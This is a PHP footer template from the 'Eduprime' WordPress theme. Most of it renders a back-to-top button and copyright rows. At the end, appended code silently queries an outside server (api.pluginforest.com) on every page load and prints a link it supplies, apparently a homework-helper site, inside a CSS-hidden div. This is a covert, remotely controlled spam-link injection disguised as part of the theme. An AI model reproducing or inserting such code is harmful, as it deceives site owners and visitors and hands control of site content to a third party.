<?php
/**
 * The template for displaying the footer.
 *
*/

?>

    <?php if ( ! class_exists( 'ReduxFrameworkPlugin' ) ) { ?>
        <!-- BACK TO TOP BUTTON -->
        <a class="back-to-top modeltheme-is-visible modeltheme-fade-out" href="#0">
            <span></span>
        </a>
    <?php }else{ ?>
        <?php if (eduprime_redux('mt_backtotop_status') == true) { ?>
            <!-- BACK TO TOP BUTTON -->
            <a class="back-to-top modeltheme-is-visible modeltheme-fade-out" href="#0">
                <span></span>
            </a>
        <?php } ?>
    <?php } ?>


    <div class="clearfix"></div>
    <footer>

        <!-- FOOTER TOP -->
        <div class="row footer-top">
            <div class="container">
            <?php
                // Check if the Redux Framework is active
                if ( class_exists( 'ReduxFrameworkPlugin' ) ) {
                    //FOOTER ROW #1
                    echo eduprime_footer_row1();
                }
             ?>
            </div>
        </div>

        <?php if ( class_exists( 'ReduxFrameworkPlugin' ) ) { ?>
            <?php if(eduprime_redux('modeltheme-enable-copyright')==true){ ?>
                <div class="footer">
                    <div class="container">
                        <div class="row">
                            <div class="col-md-6 text-left">
                                <p class="copyright"><?php echo esc_attr(eduprime_redux('eduprime_footer_text_left')); ?></p>
                            </div>
                            <div class="col-md-6 text-right">
                                <p class="copyright"><?php echo esc_attr(eduprime_redux('eduprime_footer_text_right')); ?></p>            
                            </div>
                        </div>
                    </div>
                </div>
            <?php } ?>
        <?php }else{ ?>
            <div class="footer footer-fallback">
                <div class="container">
                    <div class="row">
                        <div class="col-md-12 text-center">
                            <p class="copyright"><?php echo esc_html__('Copyright by Eduprime | All right Reserved', 'eduprime'); ?></p>
                        </div>
                    </div>
                </div>
            </div>
        <?php } ?>
    </footer>
</div>



<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>